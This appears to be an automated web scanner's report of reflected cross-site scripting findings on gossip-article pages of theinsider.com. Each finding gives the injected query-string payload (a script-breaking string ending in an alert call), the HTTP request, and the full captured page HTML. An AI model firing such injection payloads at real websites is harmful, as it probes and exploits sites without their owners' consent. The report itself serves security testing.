Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Say What ...?! Heidi Montag the Book Lover?!</title><meta name="description" content="" /><meta name="keywords" content="heidi montag, Hunger Games, reality show couples, reality tv" /><meta name="category" content="gossip" /><meta name="date" content="2011-08-12 13:55:00" /><meta property="og:title" content="Say What ...?! Heidi Montag the Book Lover?!" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/gossip/43370_Say_What_Heidi_Montag_the_Book_Lover/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/photo/2011/06/74605/heidi_montag_150.jpg" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="og:description" content="Well now I've really heard it all! Prepare yourself pop-culture enthusiasts-- apparently Heidi Montag reads ...books! Say whaaaaaat!? I know, I'm just as shocked as you are. " /><meta property="fb:app_id" content="123263397703043"/><PageMap> <DataObject type="date"> <Attribute name="displaydate" value="2011-08-12 13:55:00" /> <Attribute name="sdate" value="20110812" /> </DataObject> <DataObject type="thumbnail"> <Attribute name="src" value="http://www.theinsider.com/media/photo/2011/06/74605/heidi_montag_150.jpg" /> <Attribute name="width" value="150" /> <Attribute name="height" value="150" /> </DataObject></PageMap><script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="/swfobject.js"></script><script src="/new_insider/jcapslide.js" type="text/javascript"></script><link rel="stylesheet" href="/inc/css/insider_phase_2.css" type="text/css" /><script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="Scripts/swfobject_modified.js" type="text/javascript"></script><style>.ins_fb_text { display: block; left: 2px; position: absolute; top: 42px;}.ad_center { margin: 0 auto; width: 728px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--> <!-- TOP LEADERBOARD AD --><div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/gossip_article;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/gossip_article;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/gossip_article;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div> <!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <div id="header"> <!-- LOGO --> <div id="logo"><a href="http://www.theinsider.com/" title="The Insider.com"><span>The Insider.com</span></a></div> <!-- END LOGO --> <div id="search_join_nav"> <!-- SEARCH BOX --> <div id="search"> <div id="search_wrapper"> <form action="/search/index.html?sort=date-sdate" id="cse-search-box" method="POST"> <div> <input type="text" class="searchbox" name="q" value="SEARCH THE INSIDER.COM" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}"> <input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa"> <input type="hidden" name="hq" value="more:recent4" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> </div> <div id="top_searches"> <p>TOP SEARCHES: </p><script language="javascript"> function searchPost(term) { document.forms["cse-search-box"].elements[0].value = term; document.forms["cse-search-box"].submit(); return true; }</script> <div class='searchterms'></div> </div> </div> <!-- END SEARCH BOX --> <!-- SOCIAL JOIN BUTTONS --> <div class="large_social_btns"> <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/theinsider&amp;send=false&amp;layout=button_count&amp;width=110&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px; height:21px;" allowTransparency="true" class="social_join fb"></iframe> <a href="http://www.twitter.com/theinsider" target="_blank" title="Follow Us on Twitter"><img src="/media/img/tw_joinus.jpg" alt="Follow Us on Twitter" class="social_join tw" /></a> <div style="position:absolute"><img class="ins_fb_text" alt="The Insider on Facebook" src="/media/img/ins_on_fb.jpg"></div> </div> <!-- END SOCIAL JOIN BUTTONS --> <div class="clearfix"></div> <!-- NAVIGATION -->
<div id="navbar">
<ul>
<li> <a href="/fashion"><img src="/media/img/fashion.png" alt="[ FASHION ]" /> <span class="fashion"></span> </a> </li>
<li> <a href="/lol"><img src="/media/img/lol.png" alt="[ LOL ]" /> <span class="humor"></span> </a> </li>
<li> <a href="/screen"><img src="/media/img/screen.png" alt="[ SCREEN ]" /> <span class="filmtv"></span> </a> </li>
<li> <a href="/gossip"><img src="/media/img/gossip.png" alt="[ GOSSIP ]" /> <span class="gossip"></span> </a> </li>
<li> <a href="/thelook"><img src="/media/img/thelook.png" alt="[ THE LOOK ]" /> <span class="beauty"></span> </a> </li>
<li> <a href="/tunes"><img src="/media/img/tunes.png" alt="[ TUNES ]" /> <span class="tunes"></span> </a> </li>
</ul>
</div>
<!-- END NAVIGATION --> <h1>The Insider.com</h1> </div> </div> <div class="clearfix"></div> <!-- END HEADER --> <!-- MAIN CONTENT --> <!-- BELOW: article.mc --><!– Acudeo companion banner loader script –> <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script> <script type="text/javascript"> function displayCompanionBanners(banners) { tmDisplayBanner(banners, "adCompanionBanner", 300, 250); } </script> <!– Acudeo companion banner loader script –> <link rel='stylesheet' href='/inc/gossip/gossip.css' type='text/css' /><!--[if IE 7]><style>.contrib_date1 { font-size: 12px !important; font-weight: bold; margin: -10px 0 0 5px; font-family: 'AvalonBook',Futura,"Futura BT","Century Gothic",Tahoma,Helvetica,"Helvetica Neue",Arial,sans-serif;}.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}.lovethis_storylist ul {margin-left: 30px;}.contrib_date { font-size: 12px; font-weight: bold; margin: 0 0 0 68px;}</style><![endif]--><style>.contrib_date1 { font-size: 11px !important; font-weight: normal !important; margin: 12px 0 0 5px !important; font-family: Tahoma, Helvetica, Arial, sans-serif;}.article-more-news-box img{float: left; margin-right: 15px;}#adCompanionBanner {background-color: white; text-align: left; margin: 10px 10px 10px 0;}.article-more-news-box {height: 100%; margin-bottom: 20px;}.contributor_bug {display: inline; height: 15px; padding: 0 0 0 10px; vertical-align: bottom; width: 71px;}.contrib_border { border-right: 1px solid #BBBBBB; float: left; font-size: 12px; font-weight: bold; line-height: 1; margin: -10px 0; font-family: Tahoma, Helvetica, Arial, sans-serif; padding-bottom:4px;} .contrib_border a:link, .contrib_border a:hover, .contrib_border a:visited, .contrib_border a:active {font-weight:bold;}.contrib_date {font-size: 12px; font-weight: bold; margin: -0px 0 0 68px;}.contrib_by { display: inline; float: left; font-size: 10px; height: 8px; margin: -7px 0 9px 0; width: 200px;}.contrib_container {height: 40px; border-bottom: 1px solid #000; float:left; width: 300px; padding-bottom:8px;}.contrib_cont {width: 300px; display: inline; height: 63px; float:left; margin: 0px 10px 10px 0px;}</style><!-- Main Content --><div id="main_content"><!-- LEFT COLUMN --><div id="left_col"><!-- CHANNEL TITLE --><div id="channel_title_bar"><a href='/gossip'><img src='/media/img/channel_page_name_gossip.png' class='channel_title_logo' alt='' /></a></div><!-- END CHANNEL TITLE --><!-- STORY CONTAINER --><div class="content_container"><div class="channel_story_img"><img src='/media/photo/2011/06/74608/heidi_montag_340.jpg' alt='' /><p class='photo_copyright'></p></div><p class='article'><h3>Say What ...?! Heidi Montag the Book Lover?!</h3><p class='publish_date'></p><p class='publish_date'>August 12, 2011</p><p>
Well now I've really heard it all! Prepare yourself pop-culture enthusiasts-- apparently Heidi Montag reads ...&nbsp;books! Say whaaaaaat!? I know, I'm just as shocked as you are.&nbsp; </p><p>
The bottle blonde reality &quot;star&quot; just tweeted, &quot;<em>The Hunger Games</em> is the best book I have read since <em>Harry Potter</em>.&quot; </p><p>
This is the funniest joke I've heard in ages! Heidi Montag -- READING!? Whom you kidding Heidikins!? <em>The Hunger Games</em> is the best book you've read since <em>Harry Potter!? </em>-- I'm thinking more like <em>Clifford the Big Red Dog</em>. Maybe I'm just unfairly judging her based on ... EVERYTHING&nbsp;I'VE&nbsp;EVER HEARD HER SAY, but when I think of Heidi Montag reading, I envision her atop a big white bed, a wild-eyed Spencer at her side, both of them surrounded by good-vibes crystals while confusedly looking at a picture book. </p><p>
And I'm putting&nbsp; this out into the ether -- does it count as &quot;reading&quot; if it's a book on tape? I'm going with no. Anyway, Heidi, you are such a jokester. You slay me! So thanks for the laughs, I&nbsp;needed a few chuckles today. </p><p>
-Meg Swertlow </p><!-- <a href='' target='_blank'><img src='' alt='' class='contributor_bug' /></a> --></p> <!-- SOCIAL SHARE BTNS --> <div id="end_article_social_btns"> <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.theinsider.com/gossip/43370_Say_What_Heidi_Montag_the_Book_Lover/index.html" send="true" width="90" show_faces="false" layout="button_count" font="arial"></fb:like> <!-- TWEET BTN --> <a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script> </div> <!-- END SOCIAL SHARE BTNS --> <div class="clearfix"></div> <!-- FB COMMENTING --> <div id="comments"> <h5 class="section_headings comments_heading">WHAT ARE YOUR THOUGHTS?</h5> <fb:comments href='http://www.theinsider.com/gossip/43370_Say_What_Heidi_Montag_the_Book_Lover/index.html' num_posts='4' width='660'></fb:comments> </div> <div class="clearfix"></div> <!-- END FB COMMENTING --> <div id="outbrain_suggestions_wide"><img src="/media/img/outbrainheader.gif" alt="" /><script type="text/JavaScript">var OB_permalink= 'http://www.theinsider.com';var OB_Template="insider";var OB_widgetId= 'AR_1';var OB_langJS ='http://widgets.outbrain.com/lang_en.js';if ( typeof(OB_Script)!='undefined' )OutbrainStart();else{var OB_Script = true;var str = "<script src='http://widgets.outbrain.com/outbrainWidget.js'; type='text/javascript'></"+"script>";document.write(str);}</script></div> <div class="clearfix"></div></div> <div class="article-more-news"> <h3>MORE NEWS</h3><div class="article-more-news-box"><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html"><img src="/media/photo/2011/10/93494/mute_112.jpg" alt="" class="article-more-news-150thumb" /></a><div class="ins_story_float"><h5><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-more-news-headline">Now You Know: MUTEMATH</a></h5><div class="article-more-news-text"><p>In the latest example of my music industry influence, and totally humble mindset, VH1 has selected MUTEMATH (a band I declared <a href="http://www.theinsider.com/tunes/43255_MUTEMATH_Blood_Pressure_Song_Premiere/index.html" target="_blank">you &quot;must-kno... <a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-readmore">more</a></p></a></p><p class="article-more-news-published-info">Published </p><div style="clear:both;"></div></div></div></div><div class="article-more-news-box"><a href="/movies/45571_Haley_Atwell_Talks_Captain_America/index.html"><img src="/media/photo/2011/10/93412/halery_112_paramount.jpg" alt="" class="article-more-news-150thumb" /></a><div class="ins_story_float"><h5><a href="/movies/45571_Haley_Atwell_Talks_Captain_America/index.html" class="article-more-news-headline">Hayley Atwell: I Groped Chris Evans For You!</a></h5><d..
- /gossip/43339_Miranda_Cosgrove_Escapes_Life_Threatening_Crash/

/gossip/43339_Miranda_Cosgrove_Escapes_Life_Threatening_Crash/

http://www.theinsider.com/gossip/43339_Miranda_Cosgrove_Escapes_Life_Threatening_Crash/?'%22--%3E%3C..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0025F1)</script>

Request

GET /gossip/43339_Miranda_Cosgrove_Escapes_Life_Threatening_Crash/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/gossip/43339_Miranda_Cosgrove_Escapes_Life_Threatening_Crash/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:09:11 GMT
Content-Length: 13002
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Miranda Cosgrove Escapes 'Life-Threatening' Crash</title><meta name="description" content="" /><meta name="keywords" content="icarly, miranda cosgrove, news celebrity, nickelodeon" /><meta name="category" content="gossip" /><meta name="date" content="2011-08-11 17:43:00" /><meta property="og:title" content="Miranda Cosgrove Escapes 'Life-Threatening' Crash" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/gossip/43339_Miranda_Cosgrove_Escapes_Life_Threatening_Crash/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/photo/2011/08/81908/miranda_cosgrove_lbusacca_110227_109488001_150.jpg" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="og:description" content="Both Miranda Cosgrove and her mother reportedly suffered injuries in a life-threatening crash on Thursday morning." /><meta property="fb:app_id" content="123263397703043"/><PageMap> <DataObject type="date"> <Attribute name="displaydate" value="2011-08-11 17:43:00" /> <Attribute name="sdate" value="20110811" /> </DataObject> <DataObject type="thumbnail"> <Attribute name="src" value="http://www.theinsider.com/media/photo/2011/08/81908/miranda_cosgrove_lbusacca_110227_109488001_150.jpg" /> <Attribute name="width" value="150" /> <Attribute name="height" value="150" /> </DataObject></PageMap><script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="/swfobject.js"></script><script src="/new_insider/jcapslide.js" type="text/javascript"></script><link rel="stylesheet" href="/inc/css/insider_phase_2.css" type="text/css" /><script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="Scripts/swfobject_modified.js" type="text/javascript"></script><style>.ins_fb_text { display: block; left: 2px; position: absolute; top: 42px;}.ad_center { margin: 0 auto; width: 728px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--> <!-- TOP LEADERBOARD AD --><div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/gossip_article;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/gossip_article;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/gossip_article;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div> <!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <div id="header"> <!-- LOGO --> <div id="logo"><a href="http://www.theinsider.com/" title="The Insider.com"><span>The Insider.com</span></a></div> <!-- END LOGO --> <div id="search_join_nav"> <!-- SEARCH BOX --> <div id="search"> <div id="search_wrapper"> <form action="/search/index.html?sort=date-sdate" id="cse-search-box" method="POST"> <div> <input type="text" class="searchbox" name="q" value="SEARCH THE INSIDER.COM" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}"> <input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa"> <input type="hidden" name="hq" value="more:recent4" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> </div> <div id="top_searches"> <p>TOP SEARCHES: </p><script language="javascript"> function searchPost(term) { document.forms["cse-search-box"].elements[0].value = term; document.forms["cse-search-box"].submit(); return true; }</script> <div class='searchterms'></div> </div> </div> <!-- END SEARCH BOX --> <!-- SOCIAL JOIN BUTTONS --> <div class="large_social_btns"> <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/theinsider&amp;send=false&amp;layout=button_count&amp;width=110&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px; height:21px;" allowTransparency="true" class="social_join fb"></iframe> <a href="http://www.twitter.com/theinsider" target="_blank" title="Follow Us on Twitter"><img src="/media/img/tw_joinus.jpg" alt="Follow Us on Twitter" class="social_join tw" /></a> <div style="position:absolute"><img class="ins_fb_text" alt="The Insider on Facebook" src="/media/img/ins_on_fb.jpg"></div> </div> <!-- END SOCIAL JOIN BUTTONS --> <div class="clearfix"></div> <!-- NAVIGATION -->
<div id="navbar">
<ul>
<li> <a href="/fashion"><img src="/media/img/fashion.png" alt="[ FASHION ]" /> <span class="fashion"></span> </a> </li>
<li> <a href="/lol"><img src="/media/img/lol.png" alt="[ LOL ]" /> <span class="humor"></span> </a> </li>
<li> <a href="/screen"><img src="/media/img/screen.png" alt="[ SCREEN ]" /> <span class="filmtv"></span> </a> </li>
<li> <a href="/gossip"><img src="/media/img/gossip.png" alt="[ GOSSIP ]" /> <span class="gossip"></span> </a> </li>
<li> <a href="/thelook"><img src="/media/img/thelook.png" alt="[ THE LOOK ]" /> <span class="beauty"></span> </a> </li>
<li> <a href="/tunes"><img src="/media/img/tunes.png" alt="[ TUNES ]" /> <span class="tunes"></span> </a> </li>
</ul>
</div>
<!-- END NAVIGATION --> <h1>The Insider.com</h1> </div> </div> <div class="clearfix"></div> <!-- END HEADER --> <!-- MAIN CONTENT --> <!-- BELOW: article.mc --><!– Acudeo companion banner loader script –> <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script> <script type="text/javascript"> function displayCompanionBanners(banners) { tmDisplayBanner(banners, "adCompanionBanner", 300, 250); } </script> <!– Acudeo companion banner loader script –> <link rel='stylesheet' href='/inc/gossip/gossip.css' type='text/css' /><!--[if IE 7]><style>.contrib_date1 { font-size: 12px !important; font-weight: bold; margin: -10px 0 0 5px; font-family: 'AvalonBook',Futura,"Futura BT","Century Gothic",Tahoma,Helvetica,"Helvetica Neue",Arial,sans-serif;}.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}.lovethis_storylist ul {margin-left: 30px;}.contrib_date { font-size: 12px; font-weight: bold; margin: 0 0 0 68px;}</style><![endif]--><style>.contrib_date1 { font-size: 11px !important; font-weight: normal !important; margin: 12px 0 0 5px !important; font-family: Tahoma, Helvetica, Arial, sans-serif;}.article-more-news-box img{float: left; margin-right: 15px;}#adCompanionBanner {background-color: white; text-align: left; margin: 10px 10px 10px 0;}.article-more-news-box {height: 100%; margin-bottom: 20px;}.contributor_bug {display: inline; height: 15px; padding: 0 0 0 10px; vertical-align: bottom; width: 71px;}.contrib_border { border-right: 1px solid #BBBBBB; float: left; font-size: 12px; font-weight: bold; line-height: 1; margin: -10px 0; font-family: Tahoma, Helvetica, Arial, sans-serif; padding-bottom:4px;} .contrib_border a:link, .contrib_border a:hover, .contrib_border a:visited, .contrib_border a:active {font-weight:bold;}.contrib_date {font-size: 12px; font-weight: bold; margin: -0px 0 0 68px;}.contrib_by { display: inline; float: left; font-size: 10px; height: 8px; margin: -7px 0 9px 0; width: 200px;}.contrib_container {height: 40px; border-bottom: 1px solid #000; float:left; width: 300px; padding-bottom:8px;}.contrib_cont {width: 300px; display: inline; height: 63px; float:left; margin: 0px 10px 10px 0px;}</style><!-- Main Content --><div id="main_content"><!-- LEFT COLUMN --><div id="left_col"><!-- CHANNEL TITLE --><div id="channel_title_bar"><a href='/gossip'><img src='/media/img/channel_page_name_gossip.png' class='channel_title_logo' alt='' /></a></div><!-- END CHANNEL TITLE --><!-- STORY CONTAINER --><div class="content_container"><div class="channel_story_img"><img src='/media/photo/2011/08/81909/miranda_cosgrove_340_110811.jpg' alt='' /><p class='photo_copyright'></p></div><p class='article'><h3>Cosgrove Injured in Bus Crash</h3><p class='publish_date'></p><p class='publish_date'>August 11, 2011</p><p>
Both <a href="http://www.theinsider.com/tv/41906_VIDEO_Michelle_Obama_Guest_Stars_On_iCarly/index.html" target="_blank">Miranda Cosgrove </a>and her mother reportedly suffered injuries in a &quot;life-threatening crash&quot; on Thursday morning.






</p><p>
A source told <a href="http://www.people.com/people/" target="_blank">People.com </a>that Miranda's tour bus collided with a tractor-trailer leaving the <em><a href="http://cs1.theinsider.com/screen/41416_Michelle_Obama_to_Guest_Star_on_iCarly/index.html" target="_blank">iCarly</a></em> star with a broken ankle and her mom &quot;really beaten up.&quot;






</p><p>
The bus driver may have been the most affected by the accident as he remains in critical condition.






</p><p>
&quot;A piece from the tractor-trailer went straight through the windshield and the driver's arm was sliced all the way through,&quot; the source said.






</p><p>
None of the other passengers were seriously injured, but Cosgrove has allegedly had to postpone her tour until the fall.























</p><!-- <a href='' target='_blank'><img src='' alt='' class='contributor_bug' /></a> --></p> <!-- SOCIAL SHARE BTNS --> <div id="end_article_social_btns"> <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.theinsider.com/gossip/43339_Miranda_Cosgrove_Escapes_Life_Threatening_Crash/index.html" send="true" width="90" show_faces="false" layout="button_count" font="arial"></fb:like> <!-- TWEET BTN --> <a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script> </div> <!-- END SOCIAL SHARE BTNS --> <div class="clearfix"></div> <!-- FB COMMENTING --> <div id="comments"> <h5 class="section_headings comments_heading">WHAT ARE YOUR THOUGHTS?</h5> <fb:comments href='http://www.theinsider.com/gossip/43339_Miranda_Cosgrove_Escapes_Life_Threatening_Crash/index.html' num_posts='4' width='660'></fb:comments> </div> <div class="clearfix"></div> <!-- END FB COMMENTING --> <div id="outbrain_suggestions_wide"><img src="/media/img/outbrainheader.gif" alt="" /><script type="text/JavaScript">var OB_permalink= 'http://www.theinsider.com';var OB_Template="insider";var OB_widgetId= 'AR_1';var OB_langJS ='http://widgets.outbrain.com/lang_en.js';if ( typeof(OB_Script)!='undefined' )OutbrainStart();else{var OB_Script = true;var str = "<script src='http://widgets.outbrain.com/outbrainWidget.js'; type='text/javascript'></"+"script>";document.write(str);}</script></div> <div class="clearfix"></div></div> <div class="article-more-news"> <h3>MORE NEWS</h3><div class="article-more-news-box"><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html"><img src="/media/photo/2011/10/93494/mute_112.jpg" alt="" class="article-more-news-150thumb" /></a><div class="ins_story_float"><h5><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-more-news-headline">Now You Know: MUTEMATH</a></h5><div class="article-more-news-text"><p>In the latest example of my music industry influence, and totally humble mindset, VH1 has selected MUTEMATH (a band I declared <a href="http://www.theinsider.com/tunes/43255_MUTEMATH_Blood_Pressure_Song_Premiere/index.html" target="_blank">you &quot;must-kno... <a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-readmore">more</a></p></a></p><p class="article-more-news-published-info">Published </p><div style="clear:both;"></div></div></div></div><div class="article-more-news-box"><a href="/movies/45571_Haley_Atwell_Talks_Captain_America/index.html"><img src="/media/photo/2011/10/93412/halery_112_paramount.jpg" alt="" class="article-more-news-150thumb" /></a><div class="ins_story_float"><h5><a ..
- /gossip/43359_Kelly_Osbourne_s_Tense_Paparazzi_Confrontation_video/

/gossip/43359_Kelly_Osbourne_s_Tense_Paparazzi_Confrontation_video/

http://www.theinsider.com/gossip/43359_Kelly_Osbourne_s_Tense_Paparazzi_Confrontation_video/?'%22--%..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0025E6)</script>

Request

GET /gossip/43359_Kelly_Osbourne_s_Tense_Paparazzi_Confrontation_video/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/gossip/43359_Kelly_Osbourne_s_Tense_Paparazzi_Confrontation_video/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:09:10 GMT
Content-Length: 13212
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Kelly Osbourne's Tense Paparazzi Confrontation [video]</title><meta name="description" content="" /><meta name="keywords" content="Kelly Osbourne, news, paparazzi, the roosevelt hotel" /><meta name="category" content="gossip" /><meta name="date" content="2011-08-12 10:08:00" /><meta property="og:title" content="Kelly Osbourne's Tense Paparazzi Confrontation [video]" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/gossip/43359_Kelly_Osbourne_s_Tense_Paparazzi_Confrontation_video/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/photo/2011/08/81973/vid_kelly_150_114111370.jpg" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="og:description" content="Well she's never been known to hold back has she? Kelly Osbourne was in a less than friendly mood when paparazzi swarmed her as she left the Roosevelt Hotel in Hollywood Wednesday night, and the tense scene was caught on tape." /><meta property="fb:app_id" content="123263397703043"/><PageMap> <DataObject type="date"> <Attribute name="displaydate" value="2011-08-12 10:08:00" /> <Attribute name="sdate" value="20110812" /> </DataObject> <DataObject 